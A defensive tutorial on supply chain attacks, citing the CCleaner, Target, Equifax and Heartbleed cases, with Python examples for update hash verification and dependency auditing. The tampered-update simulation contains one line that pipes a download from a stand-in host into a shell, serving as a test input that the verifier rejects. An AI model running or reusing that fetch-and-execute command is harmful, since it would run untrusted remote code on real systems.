How to Reduce the Impact of Supply Chain Attacks by Cybersecurity Procedures

Want to learn more about supply chain attacks and cybersecurity? Check out this post to learn more about protecting yourself from supply chain cyber attacks.

By Giridhara Raam
Sep. 04, 18 · Tutorial


Data protection and user privacy are in high demand this year. Enterprises are racing to adopt the right data security procedures and processes to maintain compliance and integrity. Security professionals and data protection officers need to monitor and scrutinize how data enters, leaves, and is stored within their organization, especially now that the GDPR is in full effect.

Better data management and security efforts are more essential than ever, but with new types of cyber attacks appearing every day, security professionals' skills are going to be tested. Whether it's the latest crypto-jacking threat or a fileless device takeover, data is always at risk. Did you know that even if you have the right security controls in place, your data can still be reached through an application vulnerability at your suppliers' end? Your corporate data can be compromised through a breach of your suppliers' or partners' networks, using a class of attack known as a supply chain attack.

What Is a Supply Chain Attack?

Since enterprise networks often have the correct security controls in place, attackers focus on weaker networks that already have a trusted connection to the target. A supply chain attack is when an attacker infiltrates a weak link in your supply chain, such as the network of one of your suppliers, service providers, or partners, and uses that organization's access, software, or hardware as an indirect route into your network.

How Do Supply Chain Attacks Happen?

One way that an attacker can infiltrate a network is by manipulating the devices or hardware that enter that network. They do this by intercepting a delivery from a supplier and implanting malicious code or firmware directly on the devices being shipped. If done skillfully, neither the supplier nor the customer will be aware of the malicious code.

Another method, as demonstrated by the 2017 CCleaner attack, is to inject malware into the software itself by breaking into the developer's build infrastructure. The attacker gains access to the developer's network through spear phishing or another email-based attack, then uses an unpatched internal vulnerability, such as the SMBv1 flaw targeted by the EternalBlue exploit, to move laterally to other systems. Once the attacker can reach the developer's build or testing environment, they can implant malware into the code, giving them a backdoor into every device that installs the resulting software. The poisoned build is then packaged and distributed by the legitimate vendor, so customers have no reason to distrust it. Given manufacturers' privacy policies and end-user license agreements, software found to contain malicious code is likely to make the developer of that code liable for the resulting damages.

Additionally, there's a simpler form of supply chain attack that involves taking over the web servers a vendor uses to distribute updates. An attacker who infiltrates that server can modify a patch to include malware and quickly reach many devices, because update clients typically trust whatever the server sends unless they verify a signature or hash obtained from somewhere other than that server.
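The update-server scenario is the one an integrity check on the client side catches. The following added example (not code from the original article) shows an installer that refuses a downloaded patch unless its SHA-256 matches a manifest obtained over a separate channel; the artifact name, the sample payload, the stand-in "mirror" download function and the appended backdoor line are all constructed for illustration. Note what it does not catch: in the CCleaner-style case, where the code is poisoned before the vendor builds and publishes it, the vendor's own hash matches the trojaned binary, and you need reproducible builds or independent verification of the source rather than a hash of the release.

```python
"""Verify a downloaded update against a hash manifest obtained out-of-band.

Added example, not from the original article. The artifact name, payloads and
the mirror stand-in are constructed for illustration.
"""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed sample release: the bytes the vendor actually built and published.
GOOD_UPDATE = b"#!/bin/sh\n# agent updater 1.4.2 (constructed sample)\necho installing\n"

# Manifest: artifact name -> expected SHA-256. In practice this is obtained over
# a channel independent of the download server (pinned in the deployment repo,
# or copied from release notes whose signature you verified), so a compromised
# mirror cannot rewrite both the payload and the hash at once.
TRUSTED_MANIFEST = {"agent-1.4.2.sh": sha256_hex(GOOD_UPDATE)}


def verify_update(name: str, payload: bytes, manifest=TRUSTED_MANIFEST) -> bool:
    """True only if the artifact is listed and its hash matches the pinned value."""
    expected = manifest.get(name)
    if expected is None:
        return False  # unknown artifact: never install something the manifest doesn't list
    # constant-time comparison so the check itself doesn't leak the expected digest
    return hmac.compare_digest(sha256_hex(payload), expected)


def fetch_from_mirror(name: str, tampered: bool = False) -> bytes:
    """Stand-in for the HTTP download from the vendor's update server.

    The tampered branch models the compromised server from the article: the
    vendor's genuine patch with a backdoor appended (203.0.113.0/24 is a
    documentation range, not a real host).
    """
    payload = GOOD_UPDATE
    if tampered:
        payload += b"curl -s http://203.0.113.7/x | sh\n"
    return payload


def install_update(name: str, tampered: bool = False) -> str:
    """Download, verify, and only then 'install' (here: report the decision)."""
    payload = fetch_from_mirror(name, tampered)
    if not verify_update(name, payload):
        return "rejected"
    return "installed"


if __name__ == "__main__":
    print("clean download:   ", install_update("agent-1.4.2.sh"))
    print("tampered download:", install_update("agent-1.4.2.sh", tampered=True))
```

The hash pin only helps if the manifest really is independent of the download server; fetching both from the same host just means the attacker edits two files instead of one. The step beyond this example is to have the vendor sign the manifest and to pin the vendor's public key in the client.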

Why Is it Difficult to Defend Against These Attacks?

Each vendor uses different applications and hardware to develop a product, so it's hard to design a defense that applies to every vendor.

What's more, supply chain attacks can be more devastating than other attacks, like ransomware, because the malicious code arrives through a trusted channel and can go unrecognized for a long time.

Two famous examples of supply chain attacks are the 2013 Target breach and the 2017 Equifax breach. Target's network was breached using credentials stolen from one of its third-party vendors, an HVAC contractor, while Equifax was breached through a known, unpatched vulnerability (CVE-2017-5638) in Apache Struts, the third-party web framework it used. The Equifax case shows that the supply chain also includes the software components you depend on, not just the organizations you do business with. Another historic example is the Heartbleed bug (CVE-2014-0160), a flaw in OpenSSL that affected many websites, mobile devices, and software from major vendors that had all built on the same library.
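The Equifax and Heartbleed cases are about the other half of the supply chain: the libraries and frameworks you ship. Below is an added example, not from the original article, of the basic audit that flags such a dependency: it parses a pinned lockfile and reports every package pinned below the version in which a known flaw was fixed. The lockfile, the package names and the advisory table are all constructed; the advisory identifiers are placeholders, not real CVEs, and a real deployment would feed the table from a vulnerability database rather than a literal.

```python
"""Flag pinned dependencies that are older than the first fixed version.

Added example, not from the original article. Lockfile, package names and
advisory entries are constructed placeholders.
"""
import re
from typing import Dict, List, Tuple

# Constructed lockfile for a hypothetical application, "name==version" per line.
SAMPLE_LOCKFILE = """\
webframework==2.3.31
tlslib==1.0.1
logger==4.1.0
# comment lines and blanks are ignored

imagekit==3.0.0
"""

# Constructed advisory table: package -> (first fixed version, advisory id).
# Placeholder ids; in practice this comes from a vulnerability database feed.
ADVISORIES = {
    "webframework": ("2.3.32", "ADV-0001"),
    "tlslib": ("1.0.2", "ADV-0002"),
    "imagekit": ("2.9.0", "ADV-0003"),
}


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '2.3.31' into (2, 3, 31); non-numeric suffixes such as 'g' are dropped."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def parse_lockfile(text: str) -> Dict[str, str]:
    """Read exact pins. Anything that is not 'name==version' is rejected, because
    an unpinned range cannot be audited against a fixed version."""
    deps: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, version = line.partition("==")
        if not sep or not version:
            raise ValueError(f"unpinned dependency: {line}")
        deps[name.strip().lower()] = version.strip()
    return deps


def audit(lockfile_text: str, advisories=ADVISORIES) -> List[Tuple[str, str, str, str]]:
    """Return (package, installed, fixed_in, advisory) for every vulnerable pin."""
    findings = []
    for name, installed in parse_lockfile(lockfile_text).items():
        if name not in advisories:
            continue
        fixed_in, advisory = advisories[name]
        # tuple comparison gives correct numeric ordering (2.3.9 < 2.3.31)
        if parse_version(installed) < parse_version(fixed_in):
            findings.append((name, installed, fixed_in, advisory))
    return findings


if __name__ == "__main__":
    for pkg, have, need, adv in audit(SAMPLE_LOCKFILE):
        print(f"{adv}: {pkg} {have} is vulnerable, upgrade to >= {need}")
```

Run against the sample it reports webframework and tlslib and stays silent on imagekit, which is already past its fix. The check is only as good as the pin: a dependency declared as a range rather than an exact version cannot be matched against an advisory, which is why the parser refuses it instead of guessing.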

As the market moves towards cloud computing, the risk of supply chain attacks will grow. Cloud-based software and Internet of Things (IoT) devices are easier avenues of attack, since they aren't under the direct supervision of the organizations using them. All of this software and hardware has its own supply chain, which, when exploited, leaves data completely exposed.

How Can Enterprises Reduce the Risk of Supply Chain Attacks?

Enterprises need to evaluate their partners, suppliers, resellers, and service providers in a variety of ways. They need to ensure that each organization's IT security, data protection, user privacy, and security policies are defined and audited periodically. Many companies have begun requiring third parties to satisfy specific security conditions as part of their service-level agreement, and will only do business with a third party once it has demonstrated compliance and shown how it protects the data flowing between the two organizations. For some companies, this means conducting their own penetration test of the third party's security layers.

Partnering with large, established vendors generally carries less risk than partnering with small firms, which may not have the right cybersecurity controls in place. According to a 2017 Ponemon Institute report, attacks against small and medium businesses are on the rise, and more than half of the respondents indicated that their budget isn't sufficient to support a fully effective security posture.

For enterprises to remain secure, they need to be confident that their suppliers, partners, and service providers have all established good cybersecurity procedures, so that supply chain attacks can be contained collaboratively. For many organizations, this means starting from scratch. They need to make sure the right security controls are in place at every potential attack vector, combining a reactive approach like incident response management with a proactive approach like endpoint security management.


Opinions expressed by DZone contributors are their own.
